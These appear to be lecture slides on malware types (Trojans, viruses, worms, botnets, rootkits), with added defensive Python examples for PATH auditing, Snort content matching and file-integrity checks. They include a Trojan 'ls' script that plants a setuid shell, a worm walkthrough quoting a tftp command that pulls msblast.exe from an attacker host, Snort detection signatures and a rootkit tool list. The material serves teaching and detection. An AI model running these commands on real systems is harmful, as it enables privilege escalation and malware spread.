Malware
CSC501

A Quick Recap
- Previous Lecture
  - Code Injection Attacks
- Today:
  - Malware
What is Malicious Software?
- Malicious Software (a.k.a. Malware)
  - Software designed to infiltrate or damage a computer system, without the owner's informed consent
    -- http://en.wikipedia.org/wiki/Malware
  - Examples:
    - Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
  - How about adware?
- Malware references the intent of the creator, rather than any particular features
Why should we care?
- Malware remains a top threat
  [Figure: Blaster, Nimda, CodeRed. Source: Symantec Internet Security Threat Report]
  [Figure: Conficker Worm Infection Map (as of 4/1/09) from CWG]
Recruiting Vulnerable Nodes -> Attack Network
- Zero-day exploits w/o software patches
- New attack strategies
  - Exploiting vulnerable client-side software, such as IE
  - Propagating malware with RFID tags, cell phones, ...
- Fast massive replications
- Providing "Value-Added" Services
  - DDoS, spamming, or other malicious purposes ...
  - Sell/rent attack networks for profit
Taxonomy of Malicious Software
[Diagram] Malicious programs:
- Needs host program: backdoors, logic bombs, Trojan horses, viruses
- Independent: worms, zombies
- Replicate: viruses, worms
- Rootkits (shown as a separate box in the diagram)
Backdoor
- Secret entry point into a system
  - Specific user identifier or password that circumvents normal security procedures
- Commonly used by developers

Logic Bomb
- Embedded in legitimate programs
- Activated when specified conditions are met
  - E.g., presence/absence of some file; particular date/time or particular user
- When triggered, typically damages the system
Trojan Horse
- Attacker:
    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof
- Victim:
    ls
- Program with an expected and hidden effect
  - Appears normal/expected
  - Hidden effect violates security policy
- User tricked into executing Trojan horse
  - Expects (and sees) expected behavior
  - Hidden effect performed
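The Trojan `ls` above only runs because the victim's PATH searches the current directory before /bin. The following is an added example, not code from the lecture: a small PATH audit that flags such entries and shows, in a constructed temp directory, which `ls` a shell would actually pick. All directory names are constructed for the demo.

```python
import os
import stat
import tempfile

# Added example, not from the lecture: why the victim's own "ls" wins over
# /bin/ls, and how to spot the PATH entries that make that possible.

def unsafe_path_entries(path_value):
    """PATH entries that search the current or a relative directory."""
    bad = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):            # "" and "." both mean the cwd
            bad.append(entry or "<empty>")
        elif not os.path.isabs(entry):    # e.g. "bin" or an unexpanded "~/bin"
            bad.append(entry)
    return bad

def resolve(cmd, path_value, cwd):
    """First executable named cmd along PATH, the way a shell finds it."""
    for entry in path_value.split(os.pathsep):
        base = cwd if entry in ("", ".") else entry
        candidate = os.path.join(base, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def is_shadowed(cmd, path_value, cwd, system_dirs):
    """True when cmd resolves outside the trusted system directories."""
    found = resolve(cmd, path_value, cwd)
    return found is not None and os.path.dirname(found) not in system_dirs

def make_executable(path, body):
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)

def demo():
    """Recreate the scenario: a Trojan 'ls' in the victim's home directory."""
    root = tempfile.mkdtemp()                       # constructed sandbox
    sysbin = os.path.join(root, "bin")              # stands in for /bin
    home = os.path.join(root, "home")               # stands in for /homes/victim
    os.makedirs(sysbin)
    os.makedirs(home)
    make_executable(os.path.join(sysbin, "ls"), "#!/bin/sh\necho real ls\n")
    make_executable(os.path.join(home, "ls"), "#!/bin/sh\necho trojan\n")
    risky = ".:" + sysbin          # cwd searched before the system dir
    safe = sysbin + ":" + home     # system dir first
    return {
        "risky_entries": unsafe_path_entries(risky),
        "risky_shadowed": is_shadowed("ls", risky, home, (sysbin,)),
        "safe_shadowed": is_shadowed("ls", safe, home, (sysbin,)),
    }
```

The same check applied to a real account's PATH (with `os.getcwd()` as `cwd` and the real system directories) reports whether a command typed in the current directory could be hijacked this way.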
Virus
- Self-replicating code
  - Alters normal code with "infected" version
  - Generally tries to remain undetected
- Operates when infected code executed
    if spread condition then
        for target files
            if not infected then alter to include virus
    perform malicious action
Worm
- Runs independently
  - Does not require a host program
- Propagates a fully working version of itself to other machines
- Carries a payload performing hidden tasks
  - Backdoors, spam relays, DDoS agents, ...
- Phases

Worm Propagation
[Diagram: a worm attacking a victim] 1: Target Probing; 2: Vulnerability Exploitation; 3: Replication

MSBlast Worm (Aug., 2003)
[Diagram: Blaster at 192.168.0.1 attacking Target/RPC at 192.168.10.11]
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell "cmd.exe" and binds it to port 4444/TCP
5. Creates "TFTP Server" on port 69/UDP
6. Sends "TFTP" command to shell
7. Runs TFTP command; "teleports" msblast.exe file
    >tftp -i 192.168.0.1 GET msblast.exe
8. Sends "START msblast.exe" command
9. Runs worm on target!
10. Closes connection
11. Shell closes

Snort signature:
    alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Example II: Lion/Linux Worm
[Diagram: Lion at 192.168.0.1 attacking Target/BIND at 192.168.10.11]
1. Checks reachability by connecting to 53/TCP
2. Exploits target on port 53/TCP
3. Runs a shell command
4. Runs worm on target!
5. Replicates worms on port 27374/TCP

Snort signatures:
    alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)
    alert tcp $HOME_NET any -> $EXTERNAL_NET 27374 (msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514; …)
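The Blaster and Lion rules above all hinge on Snort's `content:` option, where bytes between `|` pipes are hex and everything else is literal text, narrowed by `depth:` and `nocase`. This added example (not from the lecture and not Snort's own code) implements just that matching so the effect of each modifier can be seen on constructed payloads.

```python
# Added example, not from the lecture or from Snort: a minimal matcher for the
# content:/depth:/nocase modifiers used in the Blaster and Lion rules above.
# All payloads below are constructed for the demo.

def parse_content(spec):
    """Turn a Snort content string into bytes: text outside |..|, hex inside."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        if i % 2 == 1:                        # odd parts sit between pipes
            out += bytes.fromhex(part)        # fromhex ignores the spaces
        else:
            out += part.encode("latin-1")
    return bytes(out)

def content_matches(payload, spec, depth=None, nocase=False):
    """True if the content occurs within the first `depth` payload bytes."""
    needle = parse_content(spec)
    window = payload if depth is None else payload[:depth]
    if nocase:                                # ASCII case folding, as nocase does
        needle, window = needle.lower(), window.lower()
    return needle in window

BLASTER_CONTENT = ("|77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 "
                   "3A F2 EC 8C 34 72 98 0B CF 2E 39 0B|")
LION_CONTENT = "GET "   # sid:514 rule, used with depth:8 and nocase

def check_samples():
    # Constructed payloads: the Blaster byte sequence surrounded by filler,
    # a lowercase request to port 27374, and a request whose verb starts
    # past the 8-byte depth window.
    blaster_pkt = b"\x00" * 40 + parse_content(BLASTER_CONTENT) + b"\x90" * 8
    lion_pkt = b"get /x HTTP/1.0\r\n"
    late_pkt = b"xxxxxxxxxxGET /index.html"
    return {
        "blaster": content_matches(blaster_pkt, BLASTER_CONTENT),
        "blaster_depth8": content_matches(blaster_pkt, BLASTER_CONTENT, depth=8),
        "lion_nocase": content_matches(lion_pkt, LION_CONTENT, depth=8, nocase=True),
        "lion_case": content_matches(lion_pkt, LION_CONTENT, depth=8),
        "lion_late": content_matches(late_pkt, LION_CONTENT, depth=8, nocase=True),
    }
```

The `depth:8` window is what keeps the Lion rule from firing on every HTTP request that merely contains "GET " somewhere in its body.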
Zombie
- Secretly takes over another networked computer by exploiting software flaws
- Builds the compromised computers into a zombie network or botnet
- Uses it to indirectly launch attacks
Detailed Steps
[Diagram: attacker, unsecured computers, zombies, master server, targeted system, connected over the Internet]
1. Attacker scans Internet for unsecured systems that can be compromised
2. Attacker secretly installs zombie agent programs, turning unsecured computers into zombies
3. Zombie agents "phone home" and connect to a master server
4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system
5. Master Server sends signal to zombies to launch attack on targeted system
6. Targeted system is overwhelmed by zombie requests, denying requests from normal users

Rootkit
- "A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer"
- Goals:
  - Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)
Linux RootKit components:
  ls          Trojaned! Hide files
  du          Trojaned! Hide files
  ifconfig    Trojaned! Hide sniffing
  netstat     Trojaned! Hide connections
  chfn        Trojaned! User->r00t
  chsh        Trojaned! User->r00t
  inetd       Trojaned! Remote access
  login       Trojaned! Remote access
  passwd      Trojaned! User->r00t
  ps          Trojaned! Hide processes
  top         Trojaned! Hide processes
  rshd        Trojaned! Remote access
  syslogd     Trojaned! Hide logs
  linsniffer  Packet sniffer!
  fix         File fixer!
  z2          Zap2 utmp/wtmp/lastlog eraser!
  wted        wtmp/utmp editor!
  lled        lastlog editor!
  bindshell   port/shell type daemon!
Rootkit
- Simple rootkits:
  - Modify user programs (ls, ps)
  - Detectable by tools like Tripwire
- Sophisticated rootkits:
  - Modify the kernel itself

Rootkit Classification
[Diagram of three layouts]
- Application-level Rootkit (I): Trojan login, Trojan ps, Trojan ifconfig, good tripwire, running on an unmodified kernel
- Kernel-level Rootkit: good login, good ps, good ifconfig, good tripwire, but a Trojan kernel module inside the kernel (examples: Shadow Walker, adore)
- Application-level Rootkit (II): an evil program running alongside good programs on an unmodified kernel (examples: Hxdef, NTIllusion)
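The lrk component list and the "detectable by tools like Tripwire" point both come down to one check: a baseline of trusted binaries compared against what is on disk now. This added example (not from the lecture and not Tripwire's code) builds such a baseline in a constructed temp directory, then replaces ls and ps and drops a sniffer-like file, the way an application-level rootkit would.

```python
import hashlib
import os
import tempfile

# Added example, not from the lecture or from Tripwire: a file-integrity
# baseline that catches an application-level rootkit replacing ls, ps or
# netstat. Paths and file contents are constructed in a temp dir.

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(bindir):
    """Record size, mode and SHA-256 of every file in bindir."""
    db = {}
    for name in sorted(os.listdir(bindir)):
        p = os.path.join(bindir, name)
        st = os.stat(p)
        db[name] = (st.st_size, st.st_mode, sha256_file(p))
    return db

def verify(bindir, db):
    """Return {name: reason} for files that changed, vanished or appeared."""
    findings = {}
    current = baseline(bindir)
    for name, old in db.items():
        new = current.get(name)
        if new is None:
            findings[name] = "missing"
        elif new[2] != old[2]:
            findings[name] = "content changed"
        elif new[1] != old[1]:
            findings[name] = "mode changed"
    for name in current:
        if name not in db:
            findings[name] = "unexpected new file"
    return findings

def demo():
    bindir = tempfile.mkdtemp()                  # stands in for /bin
    for name in ("ls", "ps", "netstat"):
        with open(os.path.join(bindir, name), "wb") as fh:
            fh.write(b"#!/bin/sh\necho real " + name.encode() + b"\n")
    db = baseline(bindir)                        # taken while still clean
    # Simulate what lrk-style kits do: swap ls/ps for copies that hide
    # entries, and drop an extra sniffer binary next to them.
    for name in ("ls", "ps"):
        with open(os.path.join(bindir, name), "wb") as fh:
            fh.write(b"#!/bin/sh\necho trojaned " + name.encode() + b"\n")
    with open(os.path.join(bindir, "linsniffer"), "wb") as fh:
        fh.write(b"\x7fELF placeholder\n")       # constructed, not a real binary
    return verify(bindir, db)
```

This only works against the simple rootkits of the slide: once a kernel-level rootkit sits between the checker and the disk it can return the original file contents, so the baseline and the checker have to run from read-only or offline media to keep the comparison honest.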